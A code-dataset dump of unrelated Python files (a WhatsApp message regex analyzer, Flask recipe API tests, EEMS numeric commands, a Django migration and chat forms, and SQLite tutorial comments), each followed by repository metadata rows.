WAPP_EXTRACT_MESSAGE_REGEX = r"{date}\s*,\s*{time}\s*-\s*{participant}\s*:\s+(.+?)$"\
.format(
date=WAPP_DATE_REGEX,
time=WAPP_TIME_REGEX,
participant='%s' #UGLY UGLY UGLY!
)
WAPP_PARTICIPANT_WILDCARD = "[^:]+"
extract_message_regex = WAPP_EXTRACT_MESSAGE_REGEX
participant_wildcard = WAPP_PARTICIPANT_WILDCARD
extract_participant_regex = WAPP_EXTRACT_PARTICIPANT_REGEX
def _get_clean_words_from_line(self, line):
'''
Remove Whatsapp automatic generated messages
'''
omitted_file = '<Archivo omitido>'.lower()
filtered_line = '' if omitted_file in line else line
return super(WAPPMessageAnalyzer, self)._get_clean_words_from_line(filtered_line)
| 45.935484 | 89 | 0.514045 | 143 | 1,424 | 4.79021 | 0.300699 | 0.020438 | 0.021898 | 0.029197 | 0.359124 | 0.230657 | 0.230657 | 0.230657 | 0.178102 | 0.122628 | 0 | 0.022472 | 0.375 | 1,424 | 31 | 90 | 45.935484 | 0.747191 | 0.044944 | 0 | 0.173913 | 0 | 0.043478 | 0.125281 | 0.107277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7ad2878054453ac85ec36e78b1add4ee655d5d36 | 549 | py | Python | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 11 | 2020-06-28T16:08:05.000Z | 2022-01-20T08:50:22.000Z | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 3 | 2020-06-24T11:09:18.000Z | 2021-08-13T15:26:33.000Z | test_normalize_sentences.py | Alienmaster/german-asr-lm-tools | acd014181addf01569732bfc437ac130de6dd311 | [
"Apache-2.0"
] | 3 | 2020-06-13T11:41:49.000Z | 2020-09-14T15:47:46.000Z | import normalize_sentences
import spacy
nlp = spacy.load('de_core_news_sm')
test_sentence = 'Der schlaue Fuchs sagte "Treffen um 16:20 Uhr!" aber war schon 20 Minuten früher da. Im Jahre 1995 schuf er das Gedicht.'
def test_sent(test_sentence):
result = normalize_sentences.normalize(nlp, test_sentence)
print(test_sentence, '->', result)
test_sent('Der schlaue Fuchs sagte "Treffen um 16:20 Uhr!" aber war schon 20 Minuten früher da. Im Jahre 1995 schuf er das Gedicht.')
test_sent('Er war von 1920 bis 1988 durchgehend beschäftigt.')
| 36.6 | 138 | 0.765027 | 88 | 549 | 4.636364 | 0.5 | 0.117647 | 0.073529 | 0.098039 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0.455882 | 0 | 0.060086 | 0.151184 | 549 | 14 | 139 | 39.214286 | 0.815451 | 0 | 0 | 0 | 0 | 0.222222 | 0.557377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ad867b12b57deb0d8a3770340fa6ea4f03970c1 | 2,184 | py | Python | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | webapp/test/app_test2.py | PratikMahajan/Recipe-Management-Webapp-And-Infrastructure | 234b0685ee0367a3e37401af3bd77d6fc6cde6ce | [
"Apache-2.0"
] | null | null | null | from app import app
import unittest
import base64
import json
class TestLogin(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
self.user_name = "test2n1@mytest.com"
self.password = "thi@isMyPass123"
self.valid_credentials = base64.b64encode(b'pratik@mahajan.xyz:123@Abcd').decode('utf-8')
self.invalid_password = base64.b64encode(b'test@mytest.com:ssword11').decode('utf-8')
self.invalid_username = base64.b64encode(b'karan@example.com:password11').decode('utf-8')
def test_user_create_recipe_invalid_credentials(self):
datajson=json.dumps({
"cook_time_in_min": 15,
"prep_time_in_min": 15,
"title": "Creamy Cajun Chicken Pasta",
"cuisine": "Italian",
"servings": 2,
"ingredients": [
"4 ounces linguine pasta",
"2 boneless, skinless chicken breast halves, sliced into thin strips",
"2 teaspoons Cajun seasoning",
"2 tablespoons butter"
],
"steps": [
{
"position": 1,
"items": "some text here"
}
],
"nutrition_information": {
"calories": 100,
"cholesterol_in_mg": 4,
"sodium_in_mg": 100,
"carbohydrates_in_grams": 53.7,
"protein_in_grams": 53.7
}
})
response = self.app.post(
'/v1/recipe/', data=datajson, content_type='application/json',
headers={'Authorization': 'Basic ' + self.invalid_password})
self.assertEqual(response.status_code, 401)
def test_user_recipe_get(self):
response = self.app.get(
'/v1/recipe/f5e02bd4-55da-4243-b7fb-980b230a1138')
self.assertEqual(response.status_code, 404)
# def test_user_recipe_delete(self):
# response = self.app.delete(
# '/v1/recipe/f5e02bd4-55da-4243-b7fb-980b230a1138', headers={'Authorization': 'Basic ' + self.valid_credentials})
# self.assertEqual(response.status_code, 403)
| 34.666667 | 125 | 0.579212 | 233 | 2,184 | 5.270386 | 0.515021 | 0.028502 | 0.039088 | 0.070847 | 0.179967 | 0.065147 | 0.065147 | 0 | 0 | 0 | 0 | 0.069281 | 0.299451 | 2,184 | 62 | 126 | 35.225806 | 0.733333 | 0.111722 | 0 | 0.041667 | 0 | 0 | 0.304979 | 0.087656 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.0625 | false | 0.083333 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7ad8b48b9381ffbf31887fa648e99f17d08a746a | 282 | py | Python | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | Python/Sets/symmertic_diffrence.py | abivilion/Hackerank-Solutions- | e195fb1fce1588171cf12d99d38da32ca5c8276a | [
"MIT"
] | null | null | null | # a,b = [set(input().split()) for i in range(4)][1::2]
# print ('\n'.join(sorted(a^b, key=int)))
a,b=(int(input()),input().split())
c,d=(int(input()),input().split())
x=set(b)
y=set(d)
p=y.difference(x)
q=x.difference(y)
r=p.union(q)
print ('\n'.join(sorted(r, key=int)))
| 25.636364 | 55 | 0.567376 | 57 | 282 | 2.807018 | 0.473684 | 0.0375 | 0.125 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012 | 0.113475 | 282 | 10 | 56 | 28.2 | 0.628 | 0.326241 | 0 | 0 | 0 | 0 | 0.011299 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7adb54044291cf0ab7965afb9c970e868933f5bd | 15,841 | py | Python | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | mpilot/libraries/eems/basic.py | consbio/MPilot | e0c48b6640982c8234404b2f2ca34859b0c96dc0 | [
"MIT"
] | null | null | null | from __future__ import division
import copy
from functools import reduce
import numpy
import six
from mpilot import params
from mpilot.commands import Command
from mpilot.libraries.eems.exceptions import (
MismatchedWeights,
MixedArrayLengths,
DuplicateRawValues,
)
from mpilot.libraries.eems.mixins import SameArrayShapeMixin
from mpilot.utils import insure_fuzzy
class Copy(Command):
"""Copies the data from another field"""
display_name = "Copy"
inputs = {"InFieldName": params.ResultParameter(params.DataParameter())}
output = params.DataParameter()
def execute(self, **kwargs):
return numpy.copy(kwargs["InFieldName"].result)
class AMinusB(SameArrayShapeMixin, Command):
"""Performs A - B"""
display_name = "A Minus B"
inputs = {
"A": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"B": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
a = kwargs["A"].result
b = kwargs["B"].result
self.validate_array_shapes([a, b], lineno=self.lineno)
return a - b
class Sum(SameArrayShapeMixin, Command):
"""Sums input variables"""
display_name = "Sum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0].copy()
for arr in arrays[1:]:
result += arr
return result
class WeightedSum(SameArrayShapeMixin, Command):
"""Takes the weighted sum of input variables"""
display_name = "Weighted Sum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
),
"Weights": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
weights = kwargs["Weights"]
arrays = [c.result for c in kwargs["InFieldNames"]]
if len(weights) != len(arrays):
raise MismatchedWeights(len(weights), len(arrays))
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0] * weights[0]
for weight, arr in zip(weights[1:], arrays[1:]):
result += arr * weight
return result
class Multiply(SameArrayShapeMixin, Command):
"""Multiplies input variables"""
display_name = "Multiply"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
result = numpy.copy(arrays[0])
for arr in arrays[1:]:
result *= arr
return result
class ADividedByB(SameArrayShapeMixin, Command):
"""Performs A / B"""
display_name = "A Divided By B"
inputs = {
"A": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"B": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
a = kwargs["A"].result
b = kwargs["B"].result
self.validate_array_shapes([a, b], lineno=self.lineno)
return a / b
class Minimum(SameArrayShapeMixin, Command):
"""Takes the minimum input variables"""
display_name = "Minimum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return reduce(lambda x, y: numpy.ma.minimum(x, y), arrays)
class Maximum(SameArrayShapeMixin, Command):
"""Takes the maximum input variables"""
display_name = "Maximum"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return reduce(lambda x, y: numpy.ma.maximum(x, y), arrays)
class Mean(SameArrayShapeMixin, Command):
"""Mean of input variables"""
display_name = "Mean"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
)
}
output = params.DataParameter()
def execute(self, **kwargs):
arrays = [c.result for c in kwargs["InFieldNames"]]
self.validate_array_shapes(arrays, lineno=self.lineno)
return sum(arrays) / len(arrays)
class WeightedMean(SameArrayShapeMixin, Command):
"""Takes the weighted mean of input variables"""
display_name = "Weighted Mean"
inputs = {
"InFieldNames": params.ListParameter(
params.ResultParameter(params.DataParameter(), is_fuzzy=False)
),
"Weights": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
weights = kwargs["Weights"]
arrays = [c.result for c in kwargs["InFieldNames"]]
if len(weights) != len(arrays):
raise MismatchedWeights(len(weights), len(arrays))
self.validate_array_shapes(arrays, lineno=self.lineno)
result = arrays[0] * weights[0]
for weight, arr in zip(weights[1:], arrays[1:]):
result += arr * weight
return result / sum(weights)
class Normalize(Command):
"""Normalizes the data from another field to range (default 0:1)"""
display_name = "Normalize"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"StartVal": params.NumberParameter(required=False),
"EndVal": params.NumberParameter(required=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
start = kwargs.get("StartVal", 0)
end = kwargs.get("EndVal", 1)
arr_min = arr.min()
arr_max = arr.max()
return (arr - arr_min) * (start - end) / (arr_min - arr_max) + start
class NormalizeZScore(Command):
"""Converts input values into normalized values using linear interpolation based on Z Score"""
display_name = "Normalize by Z Score"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"TrueThresholdZScore": params.NumberParameter(required=False),
"FalseThresholdZScore": params.NumberParameter(required=False),
"StartVal": params.NumberParameter(required=False),
"EndVal": params.NumberParameter(required=False),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
true_threshold = float(kwargs.get("TrueThresholdZScore", 0))
false_threshold = float(kwargs.get("FalseThresholdZScore", 1))
start = kwargs.get("StartVal", 0)
end = kwargs.get("EndVal", 1)
raw_mean = numpy.ma.mean(arr)
raw_std = numpy.ma.std(arr)
x1 = raw_mean + raw_std * true_threshold
x2 = raw_mean + raw_std * false_threshold
y1 = end
y2 = start
result = arr.copy()
result -= x1
result *= y2 - y1
result /= x2 - x1
result += y1
# despite the name, `insure_fuzzy` works to constrain values to any range
return insure_fuzzy(result, start, end)
class NormalizeCat(Command):
"""Converts integer input values into narmalized values based on user specification"""
display_name = "Normalize by Category"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"RawValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
"DefaultNormalValue": params.NumberParameter(),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
raw_values = kwargs["RawValues"]
normal_values = kwargs["NormalValues"]
default_normal_value = kwargs["DefaultNormalValue"]
if len(raw_values) != len(normal_values):
raise MixedArrayLengths(
len(raw_values), len(normal_values), lineno=self.lineno
)
if len(raw_values) != len(set(raw_values)):
raise DuplicateRawValues(lineno=self.argument_lines.get("RawValues"))
result = numpy.ma.array(
numpy.full(arr.shape, default_normal_value, dtype=float)
)
for raw, normal in zip(raw_values, normal_values):
result[arr.data == raw] = normal
return result
class NormalizeCurve(Command):
"""Converts input values into normalized values based on user-defined curve"""
display_name = "Normalize Curve"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"RawValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
raw_values = kwargs["RawValues"]
normal_values = kwargs["NormalValues"]
if len(raw_values) != len(normal_values):
raise MixedArrayLengths(
len(raw_values), len(normal_values), lineno=self.lineno
)
if len(raw_values) != len(set(raw_values)):
raise DuplicateRawValues(lineno=self.argument_lines.get("RawValues"))
result = numpy.ma.empty(arr.shape, dtype=float)
value_pairs = sorted(zip(raw_values, normal_values))
# For raw values less than the lowest raw value, set them to the corresponding normal value
result[arr <= value_pairs[0][0]] = value_pairs[0][1]
# Assign normal values for each of the line segments that approximate the curve
for i, (raw, normal) in list(enumerate(value_pairs))[1:]:
prev_raw = value_pairs[i - 1][0]
prev_normal = value_pairs[i - 1][1]
m = (normal - prev_normal) / (raw - prev_raw)
b = prev_normal - m * prev_raw
where_idx = numpy.where(
numpy.logical_and(arr.data > prev_raw, arr.data <= raw)
)
result[where_idx] = arr.data[where_idx]
result[where_idx] *= m
result[where_idx] += b
# For raw values greater than the highest raw value, set them to the corresponding normal value
result[arr > value_pairs[-1][0]] = value_pairs[-1][1]
result.mask = arr.mask.copy()
return result
class NormalizeMeanToMid(NormalizeCurve):
"""Uses "NormalizeCurve" to create a non-linear transformation that is a good match for the input data"""
display_name = "Mean to Mid"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"IgnoreZeros": params.BooleanParameter(),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
ignore_zeros = kwargs["IgnoreZeros"]
low_value = arr.min()
high_value = arr.max()
if ignore_zeros:
arr = arr[arr != 0]
mean_value = arr.mean()
below_mean = arr[arr <= mean_value]
above_mean = arr[arr > mean_value]
high_mean = above_mean.compressed().mean()
low_mean = below_mean.compressed().mean()
raw_values = [low_value, low_mean, mean_value, high_mean, high_value]
normal_values = kwargs["NormalValues"][:]
if raw_values[-1] == raw_values[-2]:
del raw_values[-2]
del normal_values[-2]
if raw_values[0] == raw_values[1]:
del raw_values[1]
del normal_values[1]
kwargs = copy.copy(kwargs)
kwargs["RawValues"] = raw_values
kwargs["NormalValues"] = normal_values
return super(NormalizeMeanToMid, self).execute(**kwargs)
class NormalizeCurveZScore(Command):
"""Converts input values into narmalized values based on user-defined curve"""
display_name = "Normalize Curve by Z Score"
inputs = {
"InFieldName": params.ResultParameter(params.DataParameter(), is_fuzzy=False),
"ZScoreValues": params.ListParameter(params.NumberParameter()),
"NormalValues": params.ListParameter(params.NumberParameter()),
}
output = params.DataParameter()
def execute(self, **kwargs):
arr = kwargs["InFieldName"].result
z_score_values = kwargs["ZScoreValues"]
normal_values = kwargs["NormalValues"]
if len(z_score_values) != len(normal_values):
raise MixedArrayLengths(
len(z_score_values), len(normal_values), lineno=self.lineno
)
raw_mean = numpy.ma.mean(arr)
raw_std = numpy.ma.std(arr)
raw_values = [raw_mean + value * raw_std for value in z_score_values]
result = numpy.ma.empty(arr.shape, dtype=float)
value_pairs = sorted(zip(raw_values, normal_values))
# For raw values less than the lowest raw value, set them to the corresponding normal value
result[arr <= value_pairs[0][0]] = value_pairs[0][1]
# Assign normal values for each of the line segments that approximate the curve
for i, (raw, normal) in list(enumerate(value_pairs))[1:]:
prev_raw = value_pairs[i - 1][0]
prev_normal = value_pairs[i - 1][1]
m = (normal - prev_normal) / (raw - prev_raw)
b = prev_normal - m * prev_raw
where_idx = numpy.where(
numpy.logical_and(arr.data > prev_raw, arr.data <= raw)
)
result[where_idx] = arr.data[where_idx]
result[where_idx] *= m
result[where_idx] += b
# For raw values greater than the highest raw value, set them to the corresponding normal value
result[arr > value_pairs[-1][0]] = value_pairs[-1][1]
result.mask = arr.mask.copy()
return result
class PrintVars(Command):
"""Prints each variable in a list of variable names."""
display_name = "Print variable(s) to screen or file"
inputs = {
"InFieldNames": params.ListParameter(params.ResultParameter()),
"OutFileName": params.PathParameter(must_exist=False, required=False),
}
output = params.BooleanParameter()
def execute(self, **kwargs):
commands = kwargs["InFieldNames"]
out_path = kwargs.get("OutFileName")
if out_path:
with open(out_path, "w") as f_out:
f_out.write(
"\n".join(
"{}: {}".format(c.result_name, c.result) for c in commands
)
)
else:
for command in kwargs["InFieldNames"]:
print("{}: {}".format(command.result_name, command.result))
return True
| 31.9375 | 109 | 0.629506 | 1,753 | 15,841 | 5.575585 | 0.127781 | 0.066094 | 0.049724 | 0.073665 | 0.706568 | 0.680786 | 0.655003 | 0.631574 | 0.614897 | 0.601289 | 0 | 0.005502 | 0.254277 | 15,841 | 495 | 110 | 32.00202 | 0.821891 | 0.089262 | 0 | 0.548387 | 0 | 0 | 0.072271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049853 | false | 0 | 0.029326 | 0.002933 | 0.328446 | 0.002933 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7adcd3919f89846eb5519f1327db7bcb0128e793 | 953 | py | Python | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | null | null | null | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | 14 | 2020-05-13T22:15:29.000Z | 2022-03-12T00:29:32.000Z | backend/api/migrations/0022_auto_20200610_0618.py | luizfilipezs/lousher | 267afbca6874d946801bd55db2c8f64da7dd594e | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.0.5 on 2020-06-10 06:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0021_auto_20200606_0449'),
]
operations = [
migrations.AlterField(
model_name='endereco',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='endereco',
name='complemento',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='pedido',
name='status',
field=models.CharField(choices=[('em_analise', 'em análise'), ('preparando', 'preparando envio'), ('despachado', 'despachado'), ('entregue', 'entregue'), ('suspenso', 'suspenso'), ('cancelado', 'cancelado')], default='em_analise', max_length=20),
),
]
| 32.862069 | 258 | 0.593914 | 95 | 953 | 5.842105 | 0.557895 | 0.108108 | 0.135135 | 0.156757 | 0.376577 | 0.376577 | 0.281081 | 0.281081 | 0.281081 | 0.281081 | 0 | 0.055007 | 0.256034 | 953 | 28 | 259 | 34.035714 | 0.727786 | 0.047219 | 0 | 0.454545 | 1 | 0 | 0.217439 | 0.025386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ae81ffd916d508ea02a5f801963bc2929653520 | 340 | py | Python | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | src/utils.py | Benjvdg/altered-configurator | fa0ef454156eefdd6396f1c4809d5cf93ed76154 | [
"MIT"
] | null | null | null | from .configuration import Configuration
def create_config_list(lst_config):
lst_obj_config = []
for config in lst_config:
split_path = config.split("\\")
name = split_path[-1].replace(".txt", "")
new_config = Configuration(name, config)
lst_obj_config.append(new_config)
return lst_obj_config
| 28.333333 | 49 | 0.679412 | 43 | 340 | 5.046512 | 0.465116 | 0.082949 | 0.165899 | 0.165899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003745 | 0.214706 | 340 | 11 | 50 | 30.909091 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0.017647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aef14f9e97678b485424aba46ede0a6a6976f70 | 1,442 | py | Python | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | 2 | 2018-12-28T19:21:55.000Z | 2019-05-15T14:37:12.000Z | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | null | null | null | chat/forms.py | Firexd2/social-network | 8f7799aa54871843f55aed578e2c89a964c97ecc | [
"MIT"
] | 2 | 2019-10-16T08:01:04.000Z | 2021-07-13T06:02:15.000Z | from django import forms
from chat.models import Message, Room
class NewRoomForm(forms.ModelForm):
ids_users = forms.CharField(label='', required=False, widget=forms.TextInput(attrs={'hidden': 'true'}))
first_message = forms.CharField(label='Приветственное сообщение', required=False,
widget=forms.Textarea(attrs={'class': 'form-control', 'cols': '52', 'rows': '1'}))
type = forms.CharField(label='', widget=forms.TextInput(attrs={'style': 'display:none', 'value': 'conversation'}))
class Meta:
model = Room
fields = ['name', 'ids_users', 'first_message', 'type']
widgets = {'name': forms.TextInput(attrs={'class': 'form-control'})}
class EditRoomLogoForm(forms.ModelForm):
class Meta:
model = Room
fields = ['logo']
widgets = {'logo': forms.FileInput(attrs={'class': 'form-control'})}
class EditRoomNameForm(forms.ModelForm):
class Meta:
model = Room
fields = ['name']
widgets = {'name': forms.TextInput(attrs={'class': 'form-control'})}
class OutRoomForm(forms.ModelForm):
id = forms.IntegerField(label='', widget=forms.TextInput())
class Meta:
model = Room
fields = ['id']
class SendMessageForm(forms.ModelForm):
id = forms.CharField()
destination = forms.CharField()
class Meta:
model = Message
fields = ['text', 'id', 'destination']
| 27.207547 | 118 | 0.620666 | 150 | 1,442 | 5.94 | 0.353333 | 0.078563 | 0.078563 | 0.094276 | 0.291807 | 0.23569 | 0.199776 | 0.114478 | 0.114478 | 0 | 0 | 0.002667 | 0.219834 | 1,442 | 52 | 119 | 27.730769 | 0.789333 | 0 | 0 | 0.34375 | 0 | 0 | 0.149792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7af0056e7bb93cced5cf1fc4661b1b37c8a184f1 | 2,491 | py | Python | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | 2 | 2020-12-05T07:42:55.000Z | 2021-01-06T23:23:18.000Z | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | Books/GodOfPython/P17_Database/chapter17.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | from sqlite3 import *
# mydb = connect('D:/02.Python/ch17/fruit.db')
# csr = mydb.cursor()
# csr.execute('create table test(fruit varchar(20), num int, price int)')
# csr.execute("insert into test(fruit, num, price) values('Apple', 10, 1000)")
# csr.execute('select * from test')
# row = csr.fetchone()
# print(row)
# mydb.commit()
# mydb.close()
# conn = connect('C:/sqlite/mydb.db')
# csr = conn.cursor()
# csr.execute('select * from mytable')
# print(csr.fetchone())
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# c.execute('''create table mytable(word text, meaning text, level integer)''')
# c.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# c.execute('''insert into mytable(word, meaning, level)
# values("python", "A python is a large snake that kills animals by squeezing them with its body.", 2)''')
# c.execute('''insert into mytable(word, meaning, level)
# values("sql", "structured query language: a computer programing language used for database management.", 1)''')
# c.execute('''insert into mytable(word, meaning, level)
# values("apple", "An apple is a round fruit with smooth green, yellow, or red skin and firm write flesh.", 1)''')
# c.execute('''select * from mytable''')
# print(c.fetchall())
# c.close()
# conn.commit()
# conn.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# word = input('word : ')
# meaning = input('meaning : ')
# level = input('level : ')
# c.execute('insert into mytable values(?,?,?)', (word, meaning, level))
# c.execute('select * from mytable')
# print(c.fetchall())
# c.close()
# conn.commit()
# conn.close()
# conn = connect('D:/02.Python/ch17/mydb.db')
# c = conn.cursor()
# record1 = ('test_word1', 'test_word1_meaning', 1)
# record2 = ('test_word2', 'test_word2_meaning', 2)
# record3 = ('test_word3', 'test_word3_meaning', 3)
# record4 = ('test_word4', 'test_word4_meaning', 4)
# all_record = (record1, record2, record3, record4)
# c.executemany('''insert into mytable values(?,?,?)''', all_record)
# c.execute('''select * from mytable''')
# print(c.fetchall())
# c.close()
